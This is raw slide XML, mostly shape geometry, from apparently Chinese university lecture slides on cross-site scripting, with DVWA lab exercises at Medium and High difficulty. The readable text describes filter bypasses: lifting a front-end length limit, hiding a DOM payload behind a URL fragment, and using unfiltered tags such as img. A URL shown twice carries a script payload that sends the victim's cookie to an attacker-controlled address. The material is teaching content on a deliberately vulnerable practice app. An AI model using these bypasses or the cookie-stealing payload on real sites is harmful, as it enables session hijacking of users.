                <a:gd name="T4" fmla="*/ 0 w 106"/>
                <a:gd name="T5" fmla="*/ 0 h 119"/>
                <a:gd name="T6" fmla="*/ 40 w 106"/>
                <a:gd name="T7" fmla="*/ 81 h 119"/>
                <a:gd name="T8" fmla="*/ 40 w 106"/>
                <a:gd name="T9" fmla="*/ 119 h 119"/>
                <a:gd name="T10" fmla="*/ 66 w 106"/>
                <a:gd name="T11" fmla="*/ 119 h 119"/>
                <a:gd name="T12" fmla="*/ 66 w 106"/>
                <a:gd name="T13" fmla="*/ 81 h 119"/>
                <a:gd name="T14" fmla="*/ 106 w 106"/>
                <a:gd name="T15" fmla="*/ 0 h 119"/>
                <a:gd name="T16" fmla="*/ 80 w 106"/>
                <a:gd name="T17" fmla="*/ 0 h 119"/>
                <a:gd name="T18" fmla="*/ 54 w 106"/>
                <a:gd name="T19" fmla="*/ 5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19">
                  <a:moveTo>
                    <a:pt x="54" y="55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40" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54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ś1ïḋè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7698054" y="3753737"/>
              <a:ext cx="154058" cy="164964"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 24 w 48"/>
                <a:gd name="T1" fmla="*/ 0 h 51"/>
                <a:gd name="T2" fmla="*/ 0 w 48"/>
                <a:gd name="T3" fmla="*/ 26 h 51"/>
                <a:gd name="T4" fmla="*/ 24 w 48"/>
                <a:gd name="T5" fmla="*/ 51 h 51"/>
                <a:gd name="T6" fmla="*/ 48 w 48"/>
                <a:gd name="T7" fmla="*/ 26 h 51"/>
                <a:gd name="T8" fmla="*/ 24 w 48"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 24 w 48"/>
                <a:gd name="T11" fmla="*/ 44 h 51"/>
                <a:gd name="T12" fmla="*/ 11 w 48"/>
                <a:gd name="T13" fmla="*/ 26 h 51"/>
                <a:gd name="T14" fmla="*/ 24 w 48"/>
                <a:gd name="T15" fmla="*/ 7 h 51"/>
                <a:gd name="T16" fmla="*/ 36 w 48"/>
                <a:gd name="T17" fmla="*/ 26 h 51"/>
                <a:gd name="T18" fmla="*/ 24 w 48"/>
                <a:gd name="T19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51">
                  <a:moveTo>
                    <a:pt x="24" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="0"/>
                    <a:pt x="0" y="9"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="43"/>
                    <a:pt x="8" y="51"/>
                    <a:pt x="24" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="51"/>
                    <a:pt x="47" y="43"/>
                    <a:pt x="48" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="9"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24" y="44"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="44"/>
                    <a:pt x="11" y="38"/>
                    <a:pt x="11" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="14"/>
                    <a:pt x="15" y="7"/>
                    <a:pt x="24" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="7"/>
                    <a:pt x="36" y="14"/>
                    <a:pt x="36" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="38"/>
                    <a:pt x="32" y="44"/>
                    <a:pt x="2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sļïḍê"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7887558" y="3756463"/>
              <a:ext cx="106341" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 78"/>
                <a:gd name="T1" fmla="*/ 119 h 119"/>
                <a:gd name="T2" fmla="*/ 26 w 78"/>
                <a:gd name="T3" fmla="*/ 119 h 119"/>
                <a:gd name="T4" fmla="*/ 26 w 78"/>
                <a:gd name="T5" fmla="*/ 66 h 119"/>
                <a:gd name="T6" fmla="*/ 73 w 78"/>
                <a:gd name="T7" fmla="*/ 66 h 119"/>
                <a:gd name="T8" fmla="*/ 73 w 78"/>
                <a:gd name="T9" fmla="*/ 47 h 119"/>
                <a:gd name="T10" fmla="*/ 26 w 78"/>
                <a:gd name="T11" fmla="*/ 47 h 119"/>
                <a:gd name="T12" fmla="*/ 26 w 78"/>
                <a:gd name="T13" fmla="*/ 19 h 119"/>
                <a:gd name="T14" fmla="*/ 78 w 78"/>
                <a:gd name="T15" fmla="*/ 19 h 119"/>
                <a:gd name="T16" fmla="*/ 78 w 78"/>
                <a:gd name="T17" fmla="*/ 0 h 119"/>
                <a:gd name="T18" fmla="*/ 0 w 78"/>
                <a:gd name="T19" fmla="*/ 0 h 119"/>
                <a:gd name="T20" fmla="*/ 0 w 78"/>
                <a:gd name="T2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119">
                  <a:moveTo>
                    <a:pt x="0" y="119"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="26" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0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íṣlíḑé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8068883" y="3753737"/>
              <a:ext cx="134971" cy="164964"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 21 w 42"/>
                <a:gd name="T1" fmla="*/ 7 h 51"/>
                <a:gd name="T2" fmla="*/ 31 w 42"/>
                <a:gd name="T3" fmla="*/ 17 h 51"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 17 h 51"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 0 w 42"/>
                <a:gd name="T9" fmla="*/ 26 h 51"/>
                <a:gd name="T10" fmla="*/ 21 w 42"/>
                <a:gd name="T11" fmla="*/ 51 h 51"/>
                <a:gd name="T12" fmla="*/ 42 w 42"/>
                <a:gd name="T13" fmla="*/ 35 h 51"/>
                <a:gd name="T14" fmla="*/ 31 w 42"/>
                <a:gd name="T15" fmla="*/ 35 h 51"/>
                <a:gd name="T16" fmla="*/ 21 w 42"/>
                <a:gd name="T17" fmla="*/ 44 h 51"/>
                <a:gd name="T18" fmla="*/ 11 w 42"/>
                <a:gd name="T19" fmla="*/ 26 h 51"/>
                <a:gd name="T20" fmla="*/ 21 w 42"/>
                <a:gd name="T21" fmla="*/ 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51">
                  <a:moveTo>
                    <a:pt x="21" y="7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="8"/>
                    <a:pt x="30" y="11"/>
                    <a:pt x="31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1" y="6"/>
                    <a:pt x="34" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="0"/>
                    <a:pt x="0" y="9"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="43"/>
                    <a:pt x="7" y="51"/>
                    <a:pt x="21" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="51"/>
                    <a:pt x="41" y="46"/>
                    <a:pt x="42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0" y="41"/>
                    <a:pt x="27" y="44"/>
                    <a:pt x="21" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="44"/>
                    <a:pt x="12" y="38"/>
                    <a:pt x="11" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="14"/>
                    <a:pt x="15" y="8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Slïḓe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8236574" y="3756463"/>
              <a:ext cx="132244" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 71 w 97"/>
                <a:gd name="T1" fmla="*/ 45 h 119"/>
                <a:gd name="T2" fmla="*/ 26 w 97"/>
                <a:gd name="T3" fmla="*/ 45 h 119"/>
                <a:gd name="T4" fmla="*/ 26 w 97"/>
                <a:gd name="T5" fmla="*/ 0 h 119"/>
                <a:gd name="T6" fmla="*/ 0 w 97"/>
                <a:gd name="T7" fmla="*/ 0 h 119"/>
                <a:gd name="T8" fmla="*/ 0 w 97"/>
                <a:gd name="T9" fmla="*/ 119 h 119"/>
                <a:gd name="T10" fmla="*/ 26 w 97"/>
                <a:gd name="T11" fmla="*/ 119 h 119"/>
                <a:gd name="T12" fmla="*/ 26 w 97"/>
                <a:gd name="T13" fmla="*/ 66 h 119"/>
                <a:gd name="T14" fmla="*/ 71 w 97"/>
                <a:gd name="T15" fmla="*/ 66 h 119"/>
                <a:gd name="T16" fmla="*/ 71 w 97"/>
                <a:gd name="T17" fmla="*/ 119 h 119"/>
                <a:gd name="T18" fmla="*/ 97 w 97"/>
                <a:gd name="T19" fmla="*/ 119 h 119"/>
                <a:gd name="T20" fmla="*/ 97 w 97"/>
                <a:gd name="T21" fmla="*/ 0 h 119"/>
                <a:gd name="T22" fmla="*/ 71 w 97"/>
                <a:gd name="T23" fmla="*/ 0 h 119"/>
                <a:gd name="T24" fmla="*/ 71 w 97"/>
                <a:gd name="T25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19">
                  <a:moveTo>
                    <a:pt x="71" y="45"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="26" y="45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26" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71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ŝ1îḓé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8409718" y="3756463"/>
              <a:ext cx="32720" cy="1622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š1idé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8484702" y="3756463"/>
              <a:ext cx="144514" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 83 w 106"/>
                <a:gd name="T1" fmla="*/ 93 h 119"/>
                <a:gd name="T2" fmla="*/ 83 w 106"/>
                <a:gd name="T3" fmla="*/ 93 h 119"/>
                <a:gd name="T4" fmla="*/ 38 w 106"/>
                <a:gd name="T5" fmla="*/ 0 h 119"/>
                <a:gd name="T6" fmla="*/ 0 w 106"/>
                <a:gd name="T7" fmla="*/ 0 h 119"/>
                <a:gd name="T8" fmla="*/ 0 w 106"/>
                <a:gd name="T9" fmla="*/ 119 h 119"/>
                <a:gd name="T10" fmla="*/ 23 w 106"/>
                <a:gd name="T11" fmla="*/ 119 h 119"/>
                <a:gd name="T12" fmla="*/ 23 w 106"/>
                <a:gd name="T13" fmla="*/ 19 h 119"/>
                <a:gd name="T14" fmla="*/ 23 w 106"/>
                <a:gd name="T15" fmla="*/ 19 h 119"/>
                <a:gd name="T16" fmla="*/ 71 w 106"/>
                <a:gd name="T17" fmla="*/ 119 h 119"/>
                <a:gd name="T18" fmla="*/ 106 w 106"/>
                <a:gd name="T19" fmla="*/ 119 h 119"/>
                <a:gd name="T20" fmla="*/ 106 w 106"/>
                <a:gd name="T21" fmla="*/ 0 h 119"/>
                <a:gd name="T22" fmla="*/ 83 w 106"/>
                <a:gd name="T23" fmla="*/ 0 h 119"/>
                <a:gd name="T24" fmla="*/ 83 w 106"/>
                <a:gd name="T25" fmla="*/ 9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119">
                  <a:moveTo>
                    <a:pt x="83" y="93"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="83" y="93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23" y="1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71" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8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ṣḻide"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8657846" y="3756463"/>
              <a:ext cx="158148" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 74 w 116"/>
                <a:gd name="T1" fmla="*/ 0 h 119"/>
                <a:gd name="T2" fmla="*/ 43 w 116"/>
                <a:gd name="T3" fmla="*/ 0 h 119"/>
                <a:gd name="T4" fmla="*/ 0 w 116"/>
                <a:gd name="T5" fmla="*/ 119 h 119"/>
                <a:gd name="T6" fmla="*/ 24 w 116"/>
                <a:gd name="T7" fmla="*/ 119 h 119"/>
                <a:gd name="T8" fmla="*/ 34 w 116"/>
                <a:gd name="T9" fmla="*/ 93 h 119"/>
                <a:gd name="T10" fmla="*/ 81 w 116"/>
                <a:gd name="T11" fmla="*/ 93 h 119"/>
                <a:gd name="T12" fmla="*/ 90 w 116"/>
                <a:gd name="T13" fmla="*/ 119 h 119"/>
                <a:gd name="T14" fmla="*/ 116 w 116"/>
                <a:gd name="T15" fmla="*/ 119 h 119"/>
                <a:gd name="T16" fmla="*/ 74 w 116"/>
                <a:gd name="T17" fmla="*/ 0 h 119"/>
                <a:gd name="T18" fmla="*/ 41 w 116"/>
                <a:gd name="T19" fmla="*/ 74 h 119"/>
                <a:gd name="T20" fmla="*/ 57 w 116"/>
                <a:gd name="T21" fmla="*/ 21 h 119"/>
                <a:gd name="T22" fmla="*/ 60 w 116"/>
                <a:gd name="T23" fmla="*/ 21 h 119"/>
                <a:gd name="T24" fmla="*/ 74 w 116"/>
                <a:gd name="T25" fmla="*/ 74 h 119"/>
                <a:gd name="T26" fmla="*/ 41 w 116"/>
                <a:gd name="T27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119">
                  <a:moveTo>
                    <a:pt x="74" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="43" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="41" y="74"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41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4" name="椭圆 53"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307394" y="147389"/>
            <a:ext cx="594613" cy="5946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-1"/>
            <a:ext cx="10858500" cy="817564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b" anchorCtr="0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60400" y="6581524"/>
            <a:ext cx="2743200" cy="22703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50" spc="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美美与共 知行合一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88402" y="6581524"/>
            <a:ext cx="2730498" cy="22703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/>
              <a:t>Minzu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> University of China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F0210-9EFB-4FBE-AADD-CE66351048B3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77.132/dvwa/vulnerabilities/xss_d/?default=%3cscript%3elocation.href=%22http://192.168.77.130/cookie.php?cookie=%22+&#8220;tt&#8221;%3c/script%3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77.132/dvwa/vulnerabilities/xss_d/?default=%3cscript%3elocation.href=%22http://192.168.77.130/cookie.php?cookie=%22+&#8220;tt&#8221;%3c/script%3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cui_yonghua/article/details/126579098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标题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80009"/>
                </a:solidFill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跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="780009"/>
                </a:solidFill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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="780009"/>
                </a:solidFill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介绍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2317750" y="4968911"/>
            <a:ext cx="7556500" cy="296271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SHANGHAI JIAO TONG UNIVERSITY</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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7BC405-76A4-8659-931F-7FF4CD32B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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场练习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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级别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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760462" y="1379382"/>
            <a:ext cx="10884461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Medium_Stored: Message</a:t>
            </a:r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框所有特殊字符进行了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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addslashes</a:t>
            </a:r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转义，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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name</a:t>
            </a:r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中只有长度限制和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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script</a:t>
            </a:r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替换</a:t>
            </a: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通过修改前端代码即可绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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name</a:t>
            </a:r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中长度限制：</a:t>
            </a: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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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sz="2400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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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98499F-E5F3-1B27-E49F-93D55C608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44" y="1880181"/>
            <a:ext cx="6711045" cy="27330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D444EA0-0219-97E7-BFBE-845718B56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44" y="5141209"/>
            <a:ext cx="4351397" cy="3276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AE2B3A6-5E36-F736-B723-6CF48D0C9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2276" y="5359448"/>
            <a:ext cx="4244708" cy="112023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F9019ED-50BF-27E0-63EE-291CB25080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2275" y="4310557"/>
            <a:ext cx="3886537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19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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场练习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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级别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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760462" y="1379382"/>
            <a:ext cx="10438983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High</a:t>
            </a:r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级别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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PHP</a:t>
            </a:r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源码增加了更多的限制：</a:t>
            </a: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sz="800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r>
              <a:rPr lang="en-US" altLang="zh-CN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High_DOM: </a:t>
            </a:r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如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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GET</a:t>
            </a:r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提交不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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case</a:t>
            </a:r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后的参数，将重定向为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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”?=default=English”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通过使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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URL</a:t>
            </a:r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锚点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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”##”</a:t>
            </a:r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，让本地存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r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语句，而浏览器不传回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r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语句从而绕过检查。</a:t>
            </a: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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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sz="2400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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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091C06-E730-E50D-944E-C0C14497D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07" y="2209694"/>
            <a:ext cx="4801016" cy="24386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73FDD3F-1F02-525C-DA8A-DA5626148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15240"/>
            <a:ext cx="4587638" cy="14174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6ACE601-43D1-7C3C-55FC-BBB1CA05F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507" y="5347644"/>
            <a:ext cx="6945473" cy="31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26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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场练习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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级别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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760462" y="1379382"/>
            <a:ext cx="10438983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High_Reflected: </a:t>
            </a:r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对包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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script</a:t>
            </a:r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的表达式进行正则替换</a:t>
            </a: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暴力测试找到没有被过滤的标签（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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e.g. &lt;img&gt;)</a:t>
            </a:r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即可绕过。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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sz="2400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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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B172CE-87F1-0EC9-32C0-F1C3D65C1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07" y="1981127"/>
            <a:ext cx="5540220" cy="16765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37E5915-8F6C-FA7F-C7F1-C215D69F6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414" y="4857169"/>
            <a:ext cx="4587638" cy="14479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881CE53-6936-33C1-0B10-BCD8049B8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507" y="4316464"/>
            <a:ext cx="8382727" cy="37188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0EFE831-699B-A8ED-6D7C-7C65A3721A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507" y="4962011"/>
            <a:ext cx="3490262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001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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760461" y="621130"/>
            <a:ext cx="6792326" cy="10358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三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场练习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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级别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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760460" y="1153069"/>
            <a:ext cx="10438983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High_Stored: </a:t>
            </a:r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同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Medium</a:t>
            </a:r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，只是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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name</a:t>
            </a:r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中增加对包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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script</a:t>
            </a:r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的表达式进行正则替换</a:t>
            </a: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sz="800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同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Medium</a:t>
            </a:r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，多了一步找到没有被过滤的标签（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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e.g. &lt;img&gt;)</a:t>
            </a:r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即可绕过。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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sz="2400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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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22291C-343F-15BB-A467-500B3A306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584187"/>
            <a:ext cx="5973502" cy="24263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6DB2F71-9972-CD01-CB00-77CA7AF14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892" y="4734488"/>
            <a:ext cx="4237087" cy="11583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D4CD2AF-5500-CF00-8E03-1C66BCC49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30" y="4441643"/>
            <a:ext cx="4092295" cy="18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53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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
